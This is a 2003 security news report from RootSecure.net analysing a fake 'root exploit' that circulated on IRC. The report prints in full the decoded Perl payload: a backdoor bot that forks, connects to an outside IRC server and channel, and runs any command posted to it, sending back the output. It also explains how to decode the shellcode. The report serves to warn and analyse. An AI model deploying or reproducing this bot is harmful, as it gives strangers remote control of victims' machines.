Rootsecure Homepage
About RootSecure
Lite Edition
User Area
Audio News
Daily Newsletter
Site News Archives
Sources News Archive
SecNews RSS Feeds
SecNews Console
Links:
Videos
Security
Hacking
Wireless
Downloads:
Other
Perl Scripts
Audio Clips
Win32 Tools
Media Archive
PDF Documents
Reports
Hacker Gear
Win' Error Pic's
ASCII Generator
Your IP Address
RootSecure:
Contact
Search
Publicity
Affiliates
Attack Statistics
Syndication
(RSS/XML Feed)
Privacy Policy
Hits: 134,454,022
(Since 06/09/02)
Admin Telnet
HoneyPot Project
|
|
|
|
Reports | Reverse command execution exploit via IRC analysis
{15th Jun 2003} |
|
|
Back in May
Rootsecure.net reported how "hackers" were distributing code
on the pretence of it being a remote exploit or similar, which in fact
exploited the user who ran it by e.g. adding a new root
account / deleting files.
Since then a further arguably more dangerous so called exploit has come
to light, which if successfully executed grants anyone control of the
host machine via IRC - The same method used to distribute it, along with
the message "new root exploit is out to slackware 9.1 and redhat 9.1!
enjoy....be nice to your frinds boxes!" and a link to
http://home.no/exploited/exploits/kmodaxx.c.
The link contains realistic looking source code written in C, along with
a block of shellcode. The shellcode (executed by the C) decodes to the
following Perl script:
| ---- |
#!/usr/bin/perl
$chan="#darknet";
$nick="moron";
$server="efnet.vuurwerk.nl";
$SIG{TERM}={};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER moron +i moron :moronv2\nNICK moron\n";
$i=1;
while(<$sock>=~/^[^ ]+ ([^ ]+) /){
$mode=$1;
last if $mode=="001";
if($mode=="433"){
$i++;
$nick=~s/\d*$/$i/;
print $sock "NICK $nick\n";
}
}
print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran
a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type:
".$nick.": command\n";
while (<$sock>){
if (/^PING (.*)$/){
print $sock "PONG $1\nJOIN $chan\n";
}
if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
s/\s*$//;
$_=`$_`;
foreach (split "\n") {
print $sock "PRIVMSG $chan :$_\n";
sleep 1;
}
}
}
#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
|
The Perl script connects to the IRC server "efnet.vuurwerk.nl" on
channel "#darknet", issuing the message:
Hi, Im a moron that ran a fake 0day exploit. v2
to run commands on me, type: moron: command
In an attempt to first discover if anyone was actually in the channel,
and willing to take advantage of those that had run the exploit
Rootsecure.net ran a modified version of the code, which simply
connected, logging all messages to the console. A number
of commands were sent to the bot, including "ls" and a CTCP version request,
most likely in an attempt to confirm that it was not simply just someone
on MIRC pretending to someone who had run the script.
Since there was interest in the bot a honeypot machine was setup, running
the original Perl script, however by this time the #darknet channel had
begun issuing the message "Nick/channel is temporarily unavailable"
preventing anyone from joining.
Note: To decode the shellcode using Perl, open a new file, type $code=,
copy over the code adding full stops after each quoted line, add $code
=~ s/;/;\n/g; print $code; to the end of the file, then execute it.
Related Links:
Hackers Hack
'Script Kiddies', Rootsecure.net
-1 day exploit - Warning, Full Disclosure
|
|